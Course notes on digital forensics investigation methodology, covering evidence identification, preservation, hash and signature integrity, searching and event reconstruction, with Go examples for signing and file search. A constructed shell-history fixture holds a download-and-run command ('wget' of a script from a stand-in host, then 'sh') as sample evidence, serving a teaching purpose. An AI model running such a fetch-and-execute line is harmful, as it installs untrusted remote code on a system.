Notes - MCS
Computer Systems Forensic Analysis
  1. Introduction to Digital Forensics

Digital Crime Scene Investigation Methodology

Last updated 1 year ago

Investigation process

There is no single way to conduct an investigation.

It does not matter which process is used,

  • as long as we find the right person and do not break any laws in the process.

However, some processes are more efficient than others.

The four major phases below are based on the physical crime scene investigation process.

Phase 1 - Identify The Source of the Digital Evidence

  • Physically identify the origin of the digital evidence.

  • Choose the best approach to analyze it.

  • Seize the equipment.

Phase 2 - System Preservation

Goals

  • preserve the state of the digital crime scene.

  • reduce the amount of evidence that may be lost.

Actions vary depending on the legal, business, or operational requirements of the investigation.

  • legal requirements may force you to unplug the system and make a full copy of all data, or

  • in a case involving a spyware infection or a honeypot, no preservation at all may be performed,

  • if the case is not going to court, techniques in between can be used.

Preservation Techniques

Post-mortem Analysis

  • pull the plug to reduce the amount of evidence that is overwritten.

  • make duplicate copies of all data.

  • use write blockers to prevent evidence from being overwritten.

Live Analysis

  • kill or suspend suspect processes.

  • unplug or limit the network connection:

    • plug the system into an empty hub or switch, so that it does not log messages about a dead link.

    • use network filters to stop the perpetrator from connecting remotely and deleting data.

  • back up important data (logs, files, etc.).

Data Integrity

When important data are saved during a post-mortem or live analysis, a cryptographic hash should be calculated so that it can later be shown that the data have not changed.

MD5 Cryptographic Hash

  • this algorithm has been broken since 2004 (practical collisions).

  • use it only for backward compatibility with existing hash lists; record a current algorithm such as SHA-256 for new acquisitions.

Hash values by themselves are not enough.

  • given a message M, its hash value is H(M) = h.

  • someone who can modify M can also recompute and replace h, because h does not depend on any secret.

Possible solution:

  • Digital Signatures.

    • the signature depends on a private key, so whoever modifies M cannot produce a valid signature over the new h.

    • better if done with a secure device (for example a smart card or HSM that never releases the key).
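The point above (a bare hash can be recomputed by whoever modifies the data, a signature over the hash cannot) worked through in Go. This is an added example, not code from the notes: it hashes a constructed log line with SHA-256, signs the hash with an Ed25519 key from Go's standard library, then has an adversary edit the data and recompute h. The record layout, the sample line and the in-memory key (which in practice would live on a secure device) are assumptions of the example.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/md5"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Sha256Hex is the hash that should be recorded for acquired data.
func Sha256Hex(data []byte) string {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:])
}

// Md5Hex exists only to verify hash lists produced by older tools; do not record new MD5 values.
func Md5Hex(data []byte) string {
	sum := md5.Sum(data)
	return hex.EncodeToString(sum[:])
}

// EvidenceRecord is what the examiner stores with the acquired data: the hash h and a
// signature over h made with the examiner's private key (layout is an assumption of this example).
type EvidenceRecord struct {
	Data      []byte
	Hash      string
	Signature []byte
}

// Seal computes h = H(M) and signs h.
func Seal(priv ed25519.PrivateKey, data []byte) EvidenceRecord {
	h := Sha256Hex(data)
	return EvidenceRecord{Data: data, Hash: h, Signature: ed25519.Sign(priv, []byte(h))}
}

// HashOnlyCheck is the weak check: recompute h and compare it with the stored h.
func HashOnlyCheck(r EvidenceRecord) bool {
	return Sha256Hex(r.Data) == r.Hash
}

// SignedCheck additionally verifies that the stored h is the one the examiner signed.
func SignedCheck(pub ed25519.PublicKey, r EvidenceRecord) bool {
	return HashOnlyCheck(r) && ed25519.Verify(pub, []byte(r.Hash), r.Signature)
}

// TamperAndRehash models an adversary who can write both M and h: they alter the data and
// recompute h, which needs no secret. They keep the old signature because they lack the key.
func TamperAndRehash(r EvidenceRecord, old, repl []byte) EvidenceRecord {
	data := bytes.ReplaceAll(r.Data, old, repl)
	return EvidenceRecord{Data: data, Hash: Sha256Hex(data), Signature: r.Signature}
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader) // in practice the key stays in an HSM or smart card
	if err != nil {
		panic(err)
	}
	// Constructed sample standing in for acquired data, e.g. a saved log file.
	evidence := []byte("2024-03-01T10:15:00Z sshd: Accepted password for alice from 203.0.113.7\n")
	rec := Seal(priv, evidence)
	fmt.Println("original  hash-only:", HashOnlyCheck(rec), " signed:", SignedCheck(pub, rec))

	bad := TamperAndRehash(rec, []byte("alice"), []byte("mallory"))
	fmt.Println("tampered  hash-only:", HashOnlyCheck(bad), " signed:", SignedCheck(pub, bad))
	fmt.Println("md5   :", Md5Hex(evidence))
	fmt.Println("sha256:", Sha256Hex(evidence))
}
```

The hash-only check accepts the tampered record because the adversary simply replaced h; the signature check rejects it because the new h was never signed. Verifying the signature requires only the examiner's public key, so the check can be repeated in court without the private key ever leaving its device.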

Phase 3 - Evidence Searching

  • Goal: find data that support or refute hypotheses about an incident.

  • Typically starts with a survey of common locations based on the type of incident:

    • Web-browsing habits: look at the Web browser cache, history file, and bookmarks.

    • Linux intrusion: look for signs of a rootkit or new user accounts.

It is also important to look for evidence that refutes your hypothesis, not only for evidence that supports it.

Searching Process

  1. define the general characteristics of the object for which we are searching.

  2. look for that object in a collection of data.

  The two key steps are therefore:

    1. determining what we are looking for.

    2. where we expect to find it.

Searching Techniques

Most searching for evidence is done in a file system and inside files.

Search for files based on:

  • Their names, or patterns in their names.

  • A keyword in their content.

  • Temporal data, such as the last accessed or written time.

  • Their hash values, compared against a database of known files.

Analyze network data based on:

  • Packet headers, such as IP addresses, port numbers, protocol, ...

  • Keywords inside packet contents.
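The four file-level search techniques listed above, combined in one pass over an evidence tree. This is an added example in Go, not code from the notes: it builds a small constructed tree in a temporary directory (a shell history with a wget command, an old notes file, and a known tool renamed to holiday.pdf), then searches it by name pattern, content keyword, modification time and SHA-256 lookup against a tiny NSRL-style reference set. The file names, contents and the reference entry are all assumptions constructed for the example.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
	"time"
)

// Criteria covers the four file-level search techniques listed in the notes.
type Criteria struct {
	NamePattern   *regexp.Regexp
	Keyword       string
	ModifiedAfter time.Time
	KnownHashes   map[string]string // hex SHA-256 -> label, an NSRL-style reference set
}

// Search walks the evidence tree once and applies every criterion to each regular file,
// returning "relative/path: reason" for each match.
func Search(root string, c Criteria) ([]string, error) {
	var hits []string
	err := filepath.Walk(root, func(path string, info os.FileInfo, walkErr error) error {
		if walkErr != nil || info.IsDir() {
			return walkErr
		}
		rel := filepath.ToSlash(strings.TrimPrefix(path, root+string(os.PathSeparator)))
		content, err := os.ReadFile(path) // fine for a small sample; real tools stream large files
		if err != nil {
			return err
		}
		if c.NamePattern != nil && c.NamePattern.MatchString(info.Name()) {
			hits = append(hits, rel+": name matches "+c.NamePattern.String())
		}
		if c.Keyword != "" && strings.Contains(string(content), c.Keyword) {
			hits = append(hits, rel+": content contains "+c.Keyword)
		}
		if !c.ModifiedAfter.IsZero() && info.ModTime().After(c.ModifiedAfter) {
			hits = append(hits, rel+": written after "+c.ModifiedAfter.Format("2006-01-02"))
		}
		sum := sha256.Sum256(content) // hash depends only on content, so a renamed file still matches
		if label, ok := c.KnownHashes[hex.EncodeToString(sum[:])]; ok {
			hits = append(hits, rel+": hash matches known file "+label)
		}
		return nil
	})
	return hits, err
}

// knownToolContent is a constructed stand-in for the bytes of a tool listed in the reference set.
const knownToolContent = "#!/bin/sh\n# constructed stand-in for a known rootkit installer\n"

// BuildSample writes a small constructed evidence tree (not real case data) to a temp directory.
func BuildSample() (string, error) {
	root, err := os.MkdirTemp("", "evidence")
	if err != nil {
		return "", err
	}
	if err := os.MkdirAll(filepath.Join(root, "home", "alice", "Documents"), 0o755); err != nil {
		return "", err
	}
	files := map[string]string{
		"home/alice/.bash_history":         "wget http://example.invalid/rk.sh\nsh rk.sh\n",
		"home/alice/notes.txt":             "meeting at 10\n",
		"home/alice/Documents/holiday.pdf": knownToolContent, // the tool, renamed to look like a document
	}
	for rel, body := range files {
		if err := os.WriteFile(filepath.Join(root, filepath.FromSlash(rel)), []byte(body), 0o644); err != nil {
			return "", err
		}
	}
	old := time.Date(2020, 1, 1, 0, 0, 0, 0, time.UTC) // push notes.txt outside the time window
	return root, os.Chtimes(filepath.Join(root, "home", "alice", "notes.txt"), old, old)
}

// SampleCriteria exercises all four techniques against BuildSample's tree.
func SampleCriteria() Criteria {
	sum := sha256.Sum256([]byte(knownToolContent))
	return Criteria{
		NamePattern:   regexp.MustCompile(`(?i)\.(pdf|docx?)$`),
		Keyword:       "wget",
		ModifiedAfter: time.Date(2023, 1, 1, 0, 0, 0, 0, time.UTC),
		KnownHashes:   map[string]string{hex.EncodeToString(sum[:]): "rk.sh (constructed reference entry)"},
	}
}

func main() {
	root, err := BuildSample()
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(root)
	hits, err := Search(root, SampleCriteria())
	fmt.Println(strings.Join(hits, "\n"), err)
}
```

On the sample tree the history file is found by keyword and by time, and holiday.pdf is found by name, by time and by hash, while notes.txt matches nothing. The hash match is the one that survives renaming: the reference entry is keyed on content, so the disguised file is still identified, which is exactly why hash sets such as the NSRL are used to eliminate known files or flag known-bad ones.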

Phase 4 - Event Reconstruction

Goal: answer questions about digital events in the system.

During the Evidence Searching phase we might find several files whose content violates a law.

  • But that alone does not answer questions about events.

  • The file may be the effect of an event, but which application downloaded it? A web browser? Malicious software? Several cases have used malware as a defense (the so-called "Trojan defense").

  • It may be possible to correlate the digital events with physical events.

Event reconstruction requires knowledge about the applications and the OS that are installed on the system, so that you can create hypotheses based on their capabilities.

Notes on hash-based searching (see Searching Techniques above)

  • Comparing file hash values against a reference database, for example the National Software Reference Library (NSRL), allows finding all files of a given type even if someone has changed their names, because the hash depends only on the file content.

  • With a broken cryptographic hash algorithm it is possible to create collisions, that is, different files with the same hash value, so matches made with such an algorithm are weaker evidence.